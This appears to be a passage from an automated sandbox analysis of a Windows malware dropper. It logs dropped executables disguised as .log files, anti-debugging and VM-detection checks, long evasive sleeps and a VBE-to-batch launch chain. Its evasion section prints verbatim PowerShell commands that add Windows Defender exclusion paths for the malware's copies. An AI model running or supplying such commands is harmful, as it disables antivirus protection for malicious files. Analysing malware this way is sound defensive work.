                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fEwcKMUX.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NKXFMJFr.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XpVNKoNn.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MJbpFLtL.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TuQMKFja.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EOLhHxkb.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KCawqqLw.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DWtPcxKJ.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yeGIODyj.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cPBBKMgL.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zomqzklW.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XXPuwSTl.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GUTYNdlI.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kSAcnKQA.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yViIeRfn.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zgCYVAKQ.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nzLkJbeH.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hbKlfOQH.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QvCVTWQk.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IECYOtkU.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oROSeukq.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YqSdRlZU.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PHyNhJUm.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OxfxrZpJ.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AQlYVRJc.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\krNbnIjL.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TkxwTWEx.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aeWlDzVS.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tahrXlpt.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gBXkgMjS.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gSeCuhdU.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ddkcuipI.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kOfTBNTO.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KUhOFMFy.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IwSFjKJP.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HRugjdAD.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MBrWacSF.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PybNxWBp.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dBJtpdQc.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RfmVTnPw.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ATGgGOGO.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GQyPcgoW.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kJRJIbpu.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EXjhrjDY.log
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HNZYygDR.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xAiiOWpY.log
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_0-23453
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe TID: 7632 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460 Thread sleep count: 3515 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 Thread sleep count: 3535 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308 Thread sleep count: 35 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5740 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184 Thread sleep count: 3489 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188 Thread sleep count: 3392 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012 Thread sleep count: 3262 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4504 Thread sleep count: 69 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 4296 Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332 Thread sleep time: -30437127721620741s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332 Thread sleep time: -600000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 1836 Thread sleep time: -36000000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 1836 Thread sleep time: -600000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579516s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579404s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579288s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579186s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -579074s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578922s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578750s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578625s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578512s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578406s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578297s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578182s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -578074s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577968s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577846s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577719s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577606s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577489s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577360s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577172s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -577031s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576922s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576809s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576703s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576594s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576469s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576324s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576216s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -576109s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -575998s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -575889s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -575770s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -575641s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7072Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B2A69B
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B3C220
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3E6A3 VirtualQuery,GetSystemInfo,0_2_00B3E6A3
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 30000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 600000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 3600000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 300000
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\AppData
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile opened: C:\Users\user\AppData\Local
                          Source: updIMdPUj8.exe, 00000000.00000003.1678021124.0000000002DC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: wscript.exe, 00000001.00000002.1843050228.000000000290E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2C
                          Source: wscript.exe, 00000001.00000002.1843050228.000000000292C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56:
                          Source: wscript.exe, 00000001.00000002.1843050228.000000000290E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: svchost.exe, 0000001A.00000002.2927866559.000001D5A5E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2929870130.000001D5AB45A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3047089905.000000001C3B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeAPI call chain: ExitProcess graph end nodegraph_0-23682
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B3F838
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B47DEE mov eax, dword ptr fs:[00000030h]0_2_00B47DEE
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B4C030 GetProcessHeap,0_2_00B4C030
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3F9D5 SetUnhandledExceptionFilter,0_2_00B3F9D5
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B3FBCA
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B48EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B48EBD
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeMemory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe'
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe"
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\TAPI\ZWgKQlTqcrSB.exe "C:\Windows\TAPI\ZWgKQlTqcrSB.exe"
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3F654 cpuid 0_2_00B3F654
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00B3AF0F
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeQueries volume information: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe VolumeInformation
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
